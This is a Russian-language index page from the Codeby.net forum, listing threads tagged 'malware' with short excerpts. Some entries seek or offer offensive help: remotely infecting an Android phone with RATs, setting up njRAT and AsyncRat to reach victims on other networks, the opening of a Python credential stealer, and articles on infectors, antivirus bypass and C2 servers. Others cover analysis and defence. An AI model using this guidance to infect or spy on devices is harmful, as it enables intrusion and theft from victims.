malware
Всё по теме «malware» на форуме Codeby.net. Обсуждений: 42. Разборы, инструменты и практика по информационной безопасности.
-
Заразить удалённо Android-телефон.
Доброго времени суток! Возник такой вот вопрос. Как можно заразить малварём телефон на Android? Само устройство- Redmi Note 8 Pro, если это имеет значение. Пытался делать билды в AhMyth, SpyNote 6.4, всё без толку. При попытке установить APK выдаёт ошибку "файл недоступен". В SpyNote билд...- Keil
- Тема
- ahmyth android rat apk malware mobile malware rat spynote 6.4
- Ответы: 6
- Раздел: Мобильная безопасность
-
F
Гостевая статья BEWARE !CHINESE GoLang MALWARE MAKING SERVERS A CRYPTOMINER
In this article, we will talk about a campaign which is being run by Chinese Cyber criminals and this time they don’t want to watch what we are doing, rat her they want some resou rce s from our system to mine cryptocurrency. Some researchers from Barracuda have researched about a new variant...- Foxie
- Тема
- backdoor cryptocurrency malware monero
- Ответы: 0
- Раздел: ПЕРЕРАБОТКА
-
G
Стиллер паролей на python с отправкой на почту
Стиллер с отправкой паролей на электронную почту. Очень прост в использовании. :) #!/usr/bin/python import smtplib import base64, os, sys, re import sqlite3 import socket import platform import uuid sender = '' reciever = '' password = '' # Dont change this marker = "Morwy" def wifipass()...- GunQuest
- Тема
- malware python stealer
- Ответы: 28
- Раздел: Арсенал специалиста по ИБ
-
Софт Dangerzone: преобразователь потенциально опасных файлов
Программа берет потенциально опасные PDF-файлы, офисные документы или изображения и конвертирует их в безопасный PDF-файл. Dangerzone работает следующим образом: вы даете ему документ, в котором не уверенны, можете ли вы ему доверять (например, вложение электронной почты). Внутри песочницы...- Zer0must2b
- Тема
- danger pdf malware pdf
- Ответы: 2
- Раздел: Арсенал специалиста по ИБ
-
F
Есть ли вредонос на android устройстве.
Доброго времени суток, однажды ко мне подошел товарищ и рассказал о своих подозрениях по поводу наличия малвари внутри его Android девайса. Попрошу не кидаться ссаными тряпками, а принять существующие условия - как должное.) 1. Девайс этому человеку подарен и менять он его не собирается. 2...- f0g
- Тема
- android codeby malware расследование
- Ответы: 3
- Раздел: Мобильная безопасность
-
Гостевая статья Способы распаковать мобильное вредоносное ПО
В этой статье кратко описываются методы распаковки мобильных вредоносных программ. Он будет сосредоточен на Anubis, так как это последнее популярное вредоносное ПО уже почти год. Актеры используют приложения-капельницы в качестве основного метода распространения. Дропперы находят свои пути в...- Zer0must2b
- Тема
- android malware mobile malware
- Ответы: 0
- Раздел: ПЕРЕРАБОТКА
-
Статья Как обнаружить присутствие вредоносного кода в файле, если антивирус молчит
В статье описаны начальные методы и техники выявления вредоносного кода в файлах, и в каких условиях стоит обследовать малварь. Первым делом что нам предстоит сделать, во избежание заражения инфраструктуры малварью это: Изолировать потенциально зараженный ПК от других сетей Сделать дамп...- crew
- Тема
- malware malware analysis research
- Ответы: 19
- Раздел: Мои статьи
-
T
Исключить сайты из антивирусных баз, False positive
Здравствуйте! конкуренты каким-то образом добавили наши сайты как фишинг в разные базы антивирусов,но сайты -чистые, на многие отправили письма о ложном включении,они оперативно исключили,но от bitdefender никакой реакции... отправляли false positive через официальную форму "URL Submit" с разных...- tomrider49
- Тема
- malware антивирус веб репутация фишинг
- Ответы: 0
- Раздел: Карьера в ИБ: вакансии и проекты
-
S
Как настроить порты в Njrat | AsyncRat
Всем привет! Есть AsyncRat, аналог njrat. Прекрасно работает в одной сети, localhost. Но когда запускаешь на другом пк, попросту главная машина (атакующая) не видит атакуемую. Это скорее всего связано с тем, что задаю DNS 192.168.1.... - IPv4 Но мне нужно, чтобы атакуемая машина, могла...- SolomonRei
- Тема
- asyncrat malware njrat
- Ответы: 39
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
S
Njrat0.7d как запустить?
Доброй ночи. Скачал njrat c github https://github.com/malwares/Remote-Access-Trojan/tree/master/NJRAT Не знаю, как запустить builder, пробовал запускать Njrat0.7d.exe, ничего не происходит.- SolomonRei
- Тема
- malware njrat
- Ответы: 3
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Статья TeamViewer encryption tvr.cfg или разбор конфигурации TeamSpy
Уже не впервой хакеры используют для взлома и удаленного управления готовые программы, которые модернизируют для своих задач, раньше да и сейчас это: Radmin, DameWare, Omniquad Instant Remote Control, Remote Desktop Control, Remote Desktop Professional, Hidden Administrator, Activity Monitor...- Sunnych
- Тема
- forensic malware reverse teamspy teamviewer
- Ответы: 0
- Раздел: Мои статьи
-
Статья [0x07] Исследуем Portable EXEcutable [Пишем полноценный инфектор]
Все статьи цикла Доброго времени суток, форумчане! Эта статья является логическим продолжением сразу для двух статей - для статьи о DLL инъекциях и для статьи об инфицировании .exe файлов. Только задумайтесь, что будет, если смешать два этих способа? (Для полноценного понимания требуется...- PingVinich
- Тема
- cpp dll injection infection malware pe file pingvini4 pingvinich portable executable
- Ответы: 5
- Раздел: Мои статьи
-
Статья [0x06] Исследуем Portable Executable [DLL инъекции]
Все статьи цикла Салют, друзья! На дворе 2018 год, а мы с вами начинаем изучать DLL инъекции :). Не смотря на то, что эта техника уже много раз заезжена и всем известна, я всё же внесу свои 5 копеек, так как в будующих статьях мы будем частенько прибегать к этой технике и я просто не мог...- PingVinich
- Тема
- dll dll injection exe malware pe file pingvini4 portable executable
- Ответы: 4
- Раздел: Мои статьи
-
Статья Обнаружение Скрытых Угроз: Маскировка Вредоносного Кода в Шрифтах Windows
Введение Подход "Living Off the Land" в хакинге заключается в выполнении вредоносных действий из легитимных бинарных файлов, уже установленных на конечной системе жертвы. Для передачи внешних файлов нет необходимости упаковывать дополнительное программное обеспечение в багаж полезной нагрузки...- Tayrus
- Тема
- fonts golem hack hacktheplanet living off the land lolbin malware windows анализ вредоносного по безопасность windows защита информации кибербезопасность компьютерная безопасность маскировка кода скрытые угрозы
- Ответы: 8
- Раздел: Мои статьи
-
Статья Исследование Portable Executable: Техники внедрения кода в исполняемые файлы
Все статьи цикла Доброго времени суток, друзья. В прошлых статьях, мы внимательно изучили строение и формат исполняемых файлов, а также закрепили эти знания на практике. Начиная с этой статьи мы начнём исследовать этот вопрос с практической точки зрения. Конкретно в этой статье мы напишем...- PingVinich
- Тема
- c++ exe malware pe file portable executable virus windows анализ pe безопасность внедрение кода исполняемые файлы исследование кибербезопасность программирование
- Ответы: 16
- Раздел: Мои статьи
-
Статья [Python] Пишем динамический C2 сервер
Приветствую всех! Недавно меня опять посетила идея. А что если сделать динамический C2 сервер, возможно ли это? Теперь давайте пройдемся по теории, C2 сервер - проще говоря это сервер для контроля малваря, например малварь стучит на этот сервер, получает задание и выполняет его на зараженной...- Tayrus
- Тема
- c2-server koadic malware ngrok python server
- Ответы: 10
- Раздел: Мои статьи
-
Конкурс Вредоносные .REG файлы или как заразить систему имея доступ только к реестру
В этой статье, мы познакомимся со структурой REG-файлов и заодно рассмотрим один из методов создания вредоносных .REG файлов для получения meterpreter сессии. REG-файлы - служебные текстовые файлы для внесения изменений в реестр Windows. REG-файлы были добавлены в марте 1992 года. Они имеют...- PingVinich
- Тема
- malware pingvini4 конкурс 2
- Ответы: 2
- Раздел: Мои статьи
-
Статья Пишем малварь на Python, Часть I, Telegram-bot
Статья для участия в конкурсе на codeby Приветствую всех обитателей формура и просто заблудших душ. Python - несомненно, один из самых простых в изучении и использовании язык программирования. В этой серии статей я хочу показать приёмы написания вредоносных программ на Python 3, в целях...- Dr.Lafa
- Тема
- dr.lafa malware python3.6 конкурс конкурс 2
- Ответы: 23
- Раздел: Мои статьи
-
Статья Обход антивирусов. Антиэмуляция, обход сигнатур и все все все. Часть III.
Все части Часть I Часть II В этой статье мы продолжим рассматривать методы обхода антивирусов. ВНИМАНИЕ: Автор не призывает к нарушению УК РФ, а предоставляет информацию для общего развития. Автор не несёт ответственности за ваши действия. Метод «Я не должен этого делать!» Пример 1: Попытка...- PingVinich
- Тема
- bypass av bypassavpingvinich malicous code malware pingvinich
- Ответы: 4
- Раздел: Мои статьи
-
Статья Обход антивирусов. Антиэмуляция, обход сигнатур и все все все. Часть II.
Все части Часть I Привет! В этой статье мы продолжим обсуждать насущные проблемы обхода антивирусов. А именно продолжим обсуждать тему, которую мы затронули в этой статье. Статья не была написана мной. Я переводил существующую. ВНИМАНИЕ: Автор не призывает к нарушению УК РФ, а предоставляет...- PingVinich
- Тема
- bypassavpingvinich malicous code malware pingvinich
- Ответы: 9
- Раздел: Мои статьи